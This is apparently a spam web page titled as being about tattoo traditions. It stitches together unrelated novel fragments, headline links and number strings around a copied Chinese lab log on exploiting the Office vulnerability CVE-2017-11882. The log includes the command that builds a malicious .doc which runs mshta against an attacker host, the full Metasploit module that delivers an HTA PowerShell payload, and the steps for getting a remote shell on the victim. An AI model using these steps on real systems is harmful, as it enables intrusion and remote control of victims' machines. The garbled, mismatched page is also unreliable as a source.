“江湖规矩”中纹身的传统和禁忌

小说:“江湖规矩”中纹身的传统和禁忌作者:建成更新时间:2019-03-22字数:60888

“逃走了么?!”女孩儿仍然捧着宝珠站在云端之上,以淡然的语气说出这句既像是疑问,又像是陈述的话来。

《六祖坛经》的般若思想

芙蕾之所以会这样因为她得知了一个消息,那就是她的父亲在第八舰队当中死了,不过不是刘皓他们击落的,而是在刘皓他们加入战场之前就被zaft大军击落了,是最早被击落的战舰。
现在又突然出现在这里,还说出这一么一番话,摆明的就是一个很清楚这件事的人。

我要一次过将你彻底杀死,你的潜力,你的韧性太恐怖了,再和你打下去难保你不会再次突破,所以你这一次就给我彻底的死在这里吧,见识一下我宙斯千万载以来准备的最强军团吧。

 

Office隐藏17年的漏洞CVE_2017_11882测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html
参考文章2:https://www.cnblogs.com/i-honey/p/7885573.html
 
POC地址:https://github.com/Ridter/CVE-2017-11882/
 
中间环节出现,msf连接数据库失败的情况,解决方法:https://www.cnblogs.com/justforfun12/p/5205804.html
 
1.制造条件
 
 
这里搭建两台虚拟机进行测试!
 
测试机配置信息:
 
操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese
 
 
操作系统
Kali 2.1 中文
IP
192.168.1.104
 
首先在kali下安装nginx,或者tomcat应该也是可以的,首先将生成的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。
 
启动nginx服务:systemctl start nginx
 
使用Command43b_CVE-2017-11882.py生成doc文件
python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc";; -o cev2.doc
# 将下载好的漏洞模块放在msf任意目录下
root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
cve_2017_11882.rb的内容如下:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpServer
  def initialize(info  = {})
    super(update_info(info,
      "Name" => "Microsoft Office Payload Delivery",
      "Description" => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      "License" => MSF_LICENSE,
      "Arch" => ARCH_X86,
      "Platform" => "win",
      "Targets" =>
        [
          ["Automatic", {} ],
        ],
      "DefaultTarget" => 0,
    ))
  end
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      "win",
      p.encoded,
      "hta-psh",
      { :arch => ARCH_X86, :platform => "win "}
    )
    send_response(cli, data, "Content-Type" => "application/hta")
  end
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe "#{url}"")
  end
 
然后,这里在使用msfconsole之前,需要先打开数据库,例如 service postgresql start 
打开数据库之后,进入msfconsole,然后对msf进行初始化,执行msf init
之后search cve_2017_11882搜索漏洞模块,然后按照【参考文章2】进行配置,最后 exploit 之后启动对 8080 端口的监听,至于为什么是8080端口我也不太清楚啊!
 
2.万事俱备,只欠东风
 
这个时候,只需要在 win7 上通过浏览器的到 cve2.doc文档,打开之后,kali中命令行立刻显示已经获取到了连接,
session命令得到回话,session -i 【id】建立连接
shell命令可以得到cmd,执行net user查看用户
 
3.实验效果
 
通过这个漏洞,可以肆无忌惮的执行一些命令,例如关机,删除一些文件,收集一些系统信息还是非常有用的
在桌面新建文件夹
远程关机
虽然获取到了命令行,但是通过net user命令可以看到登录的用户级别是Guest,这就限制了一些需要权限较高的命令执行!
而且这里win7没有安装杀软,我不知道安装杀软之后word文档会不会被查杀呢?
 

 

编辑:秉邓戏安

发布:2019-03-22 01:44:01

当前文章:http://emigration.net.cn/array/hm56qi4tqt.html

假体隆胸的切口方式有哪些?影响哺乳吗? 易经智慧 十二星座的灵魂年龄是多少? 爱一个人最好的方式 不要让孩子未来孤苦无依 论多引力空间——理论假说 罗李华:摩羯座2016年运势 专家称国产航母最早半年后下水

41247 36792 60384 79865 69132 19138 21484 90064 42265 65751 35062 72314 59282 46083 22144 96615 68010 33898 57344 62823

我要说两句: (0人参与)

发布